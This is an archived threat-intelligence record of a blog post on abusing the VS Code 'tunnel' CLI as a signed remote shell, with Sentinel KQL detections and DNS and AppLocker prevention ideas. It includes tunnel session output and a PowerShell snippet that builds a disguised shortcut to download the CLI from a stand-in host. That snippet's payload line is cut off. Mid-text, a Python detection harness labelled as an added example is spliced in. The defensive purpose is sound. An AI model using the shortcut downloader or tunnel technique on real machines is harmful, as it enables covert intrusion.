{
	"id": "e33a3e96-5ccd-487e-9fad-b294856c3016",
	"created_at": "2026-04-06T01:29:05.615695Z",
	"updated_at": "2026-04-10T03:20:40.766931Z",
	"deleted_at": null,
	"sha1_hash": "86e190b35f74507ae9a83054243455a0bae7f3cc",
	"title": "Visual Studio Code: embedded reverse shell and how to block, create Sentinel Detection, and add…",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 802105,
	"plain_text": "Visual Studio Code: embedded reverse shell and how to block,\r\ncreate Sentinel Detection, and add…\r\nBy Truvis Thornton\r\nPublished: 2024-09-09 · Archived: 2026-04-06 00:39:10 UTC\r\nVisual Studio Code: embedded reverse shell and how to block, create Sentinel\r\nDetection, and add Environment Prevention — well more like ideas and concepts\r\nto prevent abuse and exploit\r\nSep 25, 2023\r\nUPDATE: Looks like MS released GPO controls finally: https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/policies\r\nPS: I’ve also seen this attack being used by Red Teams and can confirm that it is possible to deploy 100% high-fidelity\r\ndetection for this type of attack regardless of SIEM. If you have not already, be sure to build this out and\r\nmake your team stand out :) — If you dig deep enough, you can develop a blanket rule to catch any activity that's\r\nsimilar to this regardless of filename and application.\r\nhttps://medium.com/@truvis.thornton/visual-studio-code-embedded-reverse-shell-and-how-to-block-create-sentinel-detection-and-add-e864ebafaf6d\r\nPage 1 of 6\n\nOne of the worst fears of a cybersecurity expert is having to detect and prevent a signed reverse-shell binary. Guess\r\nwhat? Microsoft gladly gave us one. We can relate this back to when nmap had something like this before they\r\nremoved the feature: you could run the CLI and execute commands from the binary. Fast forward, and we still see\r\napplications providing this type of feature. This will not be the last time we see it.\r\nArticles of interest:\r\nhttps://code.visualstudio.com/docs/remote/tunnels\r\nhttps://code.visualstudio.com/blogs/2022/12/07/remote-even-better\r\nWhat makes this bad is the fact that the tunnel can be started from the command line with the portable version\r\nof code.exe. 
An attacker just has to upload the binary, which anti-virus is unlikely to flag since it is\r\na legitimate, signed Windows binary.\r\nAttack\r\nIf we get code execution on the client we can always drop the portable version of VS Code, the code CLI. If\r\nVS Code is already installed, we can just stick to the installed version; it doesn’t matter. Just know that both options\r\nexist and it is normally installed by default these days.\r\nAs the binary is signed by Microsoft it will also bypass most restrictions and not set off any alarms.\r\nC:\\Users\\kitten\\Downloads\\vscode_cli_win32_x64_cli (1)\u003e.\\code.exe tunnel\r\n*\r\n* Visual Studio Code Server\r\n*\r\n* By using the software, you agree to\r\n* the Visual Studio Code Server License Terms (https://aka.ms/vscode-server-license) and\r\n* the Microsoft Privacy Statement (https://privacy.microsoft.com/en-US/privacystatement).\r\n*\r\nTo grant access to the server, please log into https://github.com/login/device and use code BD3D-134C\r\n✔ What would you like to call this machine? · desktop-kafcprf\r\n[2023-09-25 03:45:34] info Creating tunnel with the name: desktop-kafcprf\r\nOpen this link in your browser https://vscode.dev/tunnel/desktop-kafcprf/C:/Users/kitten/Downloads/vs\r\nNot one alert went off. 
Very sneaky, and this is a very nice and clean remote shell.\r\nIf you wanted, you could build out an attack chain: (AI generated)\r\n$EXEPath = \"$env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"\r\n$pay = 'cd C:\\tmp; iwr -uri https://somecleanhostedsite/vscode_cli_win32_x64_cli.zip -OutFile vscode\r\n$arguments = \" -nop -c $pay\"\r\n$LNKName = 123\r\n$obj = New-Object -ComObject WScript.Shell\r\n$link = $obj.CreateShortcut((Get-Location).Path + \"\\\" + $LNKName + \".lnk\")\r\n$link.WindowStyle = '7'\r\n$link.TargetPath = $EXEPath\r\n$link.IconLocation = \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe,13\"\r\n$link.Arguments = $arguments\r\n$link.Save()\r\nBecause every environment and machine is different, your mileage may vary, especially as updates or changes\r\nhappen, so take these ideas and expand on them as you see fit.\r\nRemember, logging also depends on the audit settings in your environment. Endpoint log sources offer the most\r\nvisibility.\r\nFile Creation\r\nFile write of code_tunnel.json, whose location is parameter based but defaults to %UserProfile%\\.vscode-cli\\code_tunnel.json.\r\nlicense_consent.json could also be watched when testing and playing in a vanilla instance.\r\nNot the most ideal solution, as this requires endpoint logs, which can be costly, especially file-based ones.\r\nCommand Line\r\nYou could use a KQL query like the following as a quick and dirty way to get started.\r\nSecurityEvent\r\n| where EventID == 4688\r\n| where CommandLine contains \"code.exe\" and CommandLine contains \"tunnel\"\r\nDownside: code.exe can be renamed, so a rule keyed on the filename misses it. 
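As an added example that is not part of the original post, the following Python runs this section's command-line ideas (the narrow code.exe-plus-tunnel rule and the broader bare "tunnel" match), the Process Tree query from the next section, the code_tunnel.json file write from File Creation, and the DNS suffixes from the Prevention section over constructed sample records, so the logic can be checked offline before it is turned into Sentinel rules. Field names follow Sentinel's SecurityEvent table; the file and DNS record shapes, the labels, and every path, host and command line in the samples are invented here for illustration. It also adds one refinement the page only describes: treating "tunnel" as a whole argument rather than a substring, which is one way to filter the false positives of the broad rule without going back to matching on the filename.

```python
# Added example, not code from the original post. It runs the page's detection
# ideas over constructed sample records: the narrow and broad 4688 command-line
# rules, the code.exe -> cmd/powershell process-tree rule, the code_tunnel.json
# file write and the DNS suffixes from the Prevention section. Field names
# follow Sentinel's SecurityEvent table; the file/DNS record shapes, the labels
# and every path, host and command line below are invented for illustration.
import ntpath

# Wildcards from the page's DNS Blocking list, applied as suffixes.
TUNNEL_DNS_SUFFIXES = ('.tunnels.api.visualstudio.com', '.devtunnels.ms')

# Constructed 4688 process-creation records ('label' only serves the checks).
PROCESS_EVENTS = [
    {'label': 'portable', 'EventID': 4688,
     'NewProcessName': 'C:\\Users\\kitten\\Downloads\\vscode_cli\\code.exe',
     'ParentProcessName': 'C:\\Windows\\System32\\cmd.exe',
     'CommandLine': '.\\code.exe tunnel'},
    {'label': 'renamed', 'EventID': 4688,   # code.exe copied under a new name
     'NewProcessName': 'C:\\Users\\kitten\\AppData\\Local\\Temp\\svchost.exe',
     'ParentProcessName': 'C:\\Windows\\explorer.exe',
     'CommandLine': 'svchost.exe tunnel'},
    {'label': 'ssh_fp', 'EventID': 4688,    # 'tunnel' only inside a hostname
     'NewProcessName': 'C:\\Windows\\System32\\OpenSSH\\ssh.exe',
     'ParentProcessName': 'C:\\Windows\\System32\\cmd.exe',
     'CommandLine': 'ssh.exe -L 8080:localhost:80 tunnel.corp.example'},
    {'label': 'child_cmd', 'EventID': 4688,
     'NewProcessName': 'C:\\Windows\\System32\\cmd.exe',
     'ParentProcessName': 'C:\\Users\\kitten\\Downloads\\vscode_cli\\code.exe',
     'CommandLine': 'cmd.exe /c whoami'},
    {'label': 'child_ps', 'EventID': 4688,  # installed VS Code, capital C
     'NewProcessName': 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
     'ParentProcessName': 'C:\\Program Files\\Microsoft VS Code\\Code.exe',
     'CommandLine': 'powershell.exe -nop -c whoami'},
    {'label': 'benign', 'EventID': 4688,
     'NewProcessName': 'C:\\Windows\\System32\\notepad.exe',
     'ParentProcessName': 'C:\\Windows\\explorer.exe',
     'CommandLine': 'notepad.exe'},
]

# Constructed file-create and DNS-query records (simplified shapes).
FILE_EVENTS = [
    {'label': 'default_dir', 'Path': 'C:\\Users\\kitten\\.vscode-cli\\code_tunnel.json'},
    {'label': 'custom_dir', 'Path': 'D:\\stash\\code_tunnel.json'},
    {'label': 'settings', 'Path': 'C:\\Users\\kitten\\AppData\\Roaming\\Code\\User\\settings.json'},
]
DNS_EVENTS = [
    {'label': 'vs_tunnel', 'QueryName': 'region.tunnels.api.visualstudio.com'},
    {'label': 'devtunnel', 'QueryName': 'abcd1234.devtunnels.ms'},
    {'label': 'vscode_site', 'QueryName': 'code.visualstudio.com'},
]


def narrow_cli_rule(ev):
    # First query on the page: code.exe AND tunnel in the command line.
    cl = ev['CommandLine'].lower()
    return ev['EventID'] == 4688 and 'code.exe' in cl and 'tunnel' in cl


def broad_cli_rule(ev):
    # Second query on the page: any 4688 whose command line contains 'tunnel'.
    return ev['EventID'] == 4688 and 'tunnel' in ev['CommandLine'].lower()


def refined_cli_rule(ev):
    # Added FP filter for the broad rule: 'tunnel' must be a whole argument, so
    # the ssh hostname does not fire while the renamed copy still does.
    args = ev['CommandLine'].lower().split()[1:]
    return ev['EventID'] == 4688 and 'tunnel' in args


def process_tree_rule(ev):
    # Process Tree query: code.exe spawning cmd.exe or powershell.exe. 4688 logs
    # full paths, so compare the basename (KQL: endswith), not the whole field.
    parent = ntpath.basename(ev['ParentProcessName']).lower()
    child = ntpath.basename(ev['NewProcessName']).lower()
    return (ev['EventID'] == 4688 and parent == 'code.exe'
            and child in ('cmd.exe', 'powershell.exe'))


def file_write_rule(ev):
    # File Creation: the code_tunnel.json location is parameter based, so match
    # the file name anywhere, not only the %UserProfile% default.
    return ntpath.basename(ev['Path']).lower() == 'code_tunnel.json'


def dns_rule(ev):
    # DNS Blocking list as suffix matches; code.visualstudio.com itself is left
    # alone, so the block does not break ordinary VS Code use.
    name = ev['QueryName'].lower().rstrip('.')
    return any(name.endswith(suffix) for suffix in TUNNEL_DNS_SUFFIXES)


def run_detections():
    # Returns {rule name: sorted labels of the sample records that fired}.
    rules = {
        'narrow_cli': (narrow_cli_rule, PROCESS_EVENTS),
        'broad_cli': (broad_cli_rule, PROCESS_EVENTS),
        'refined_cli': (refined_cli_rule, PROCESS_EVENTS),
        'process_tree': (process_tree_rule, PROCESS_EVENTS),
        'file_write': (file_write_rule, FILE_EVENTS),
        'dns': (dns_rule, DNS_EVENTS),
    }
    return {name: sorted(ev['label'] for ev in events if rule(ev))
            for name, (rule, events) in rules.items()}


if __name__ == '__main__':
    for name, hits in run_detections().items():
        print(f'{name:13s} -> {hits}')
```

Run it directly to print which sample record trips each rule: the narrow rule misses the renamed copy, the broad rule catches it but also the ssh hostname, and the argument-level refinement keeps the renamed copy while dropping the ssh hit. The process-tree check has to work on the basename (or use endswith in KQL) because a 4688 event records the full path of the creator process, so an equality test against code.exe alone never matches.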
One option is to just look for \"tunnel\" in the command line, whatever the binary is called. This is probably the\r\nbetter starting point: filter out the FPs afterwards rather than lose visibility up front.\r\nSecurityEvent\r\n| where EventID == 4688\r\n| where CommandLine contains \"tunnel\"\r\nProcess Tree\r\nWe could look for processes spawning from the original file, or from a dropped file that is then run.\nProcess tree: code.exe -\u003e cmd.exe -\u003e .exe\nSecurityEvent\n| where EventID == 4688\n| where ParentProcessName endswith \"code.exe\"\n| where NewProcessName endswith \"cmd.exe\" or NewProcessName endswith \"powershell.exe\"\nAnother option is to correlate the file write or the outbound network connections with firewall or other\nendpoint-based logs tied to the file.\nPrevention\nAppLocker\nThis is a strong control, but it takes effort and ongoing work to maintain for many reasons.\nOne example would be to build a template that blocks the CLI by hash. Keep in mind that a hash rule has to be refreshed for every new release of the binary.\nDNS Blocking\nThis is probably the easiest to maintain and manage, as it is a central location and doesn’t require much\nreconfiguration, especially if you have full control over DNS in your environment.\n*.tunnels.api.visualstudio.com\n*.devtunnels.ms\nGPO\nWhile this looks possible for Visual Studio, there did not appear to be a way to do this for VS Code at the time of writing (see the UPDATE at the top: Microsoft has since published policy controls for dev tunnels).\nConclusion\nHopefully this gives you some ideas on how to better protect and defend against this type of attack.\r\n—\r\n☕ Like what you read? 
Did it help you?\r\nSend some coffee and love https://buymeacoffee.com/truvis :)\r\nYour support helps pay for licenses, research \u0026 development, and other costs that allow me to bring you new\r\nguides and content!\r\n❗If you are new to my content, be sure to follow/connect with me on all my other socials for new ideas and\r\nsolutions to complicated real-world problems and to jump-start your career! New content drops daily/weekly along\r\nwith tips and tricks :)\r\n👉 W: https://truv.is\r\n👉 T: https://twitter.com/thattechkitten\r\n👉 Y: https://www.youtube.com/@TRUValueInformationSecurity\r\n👉 G: https://github.com/truvis\r\n👉 L: https://www.linkedin.com/in/truvisthornton\r\n👉 M: https://medium.com/@truvis.thornton\r\nSource: https://medium.com/@truvis.thornton/visual-studio-code-embedded-reverse-shell-and-how-to-block-create-sentinel-detection-and-add-e864ebafaf6d",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://medium.com/@truvis.thornton/visual-studio-code-embedded-reverse-shell-and-how-to-block-create-sentinel-detection-and-add-e864ebafaf6d"
	],
	"report_names": [
		"visual-studio-code-embedded-reverse-shell-and-how-to-block-create-sentinel-detection-and-add-e864ebafaf6d"
	],
	"threat_actors": [],
	"ts_created_at": 1775438945,
	"ts_updated_at": 1775791240,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/86e190b35f74507ae9a83054243455a0bae7f3cc.pdf",
		"text": "https://archive.orkl.eu/86e190b35f74507ae9a83054243455a0bae7f3cc.txt",
		"img": "https://archive.orkl.eu/86e190b35f74507ae9a83054243455a0bae7f3cc.jpg"
	}
}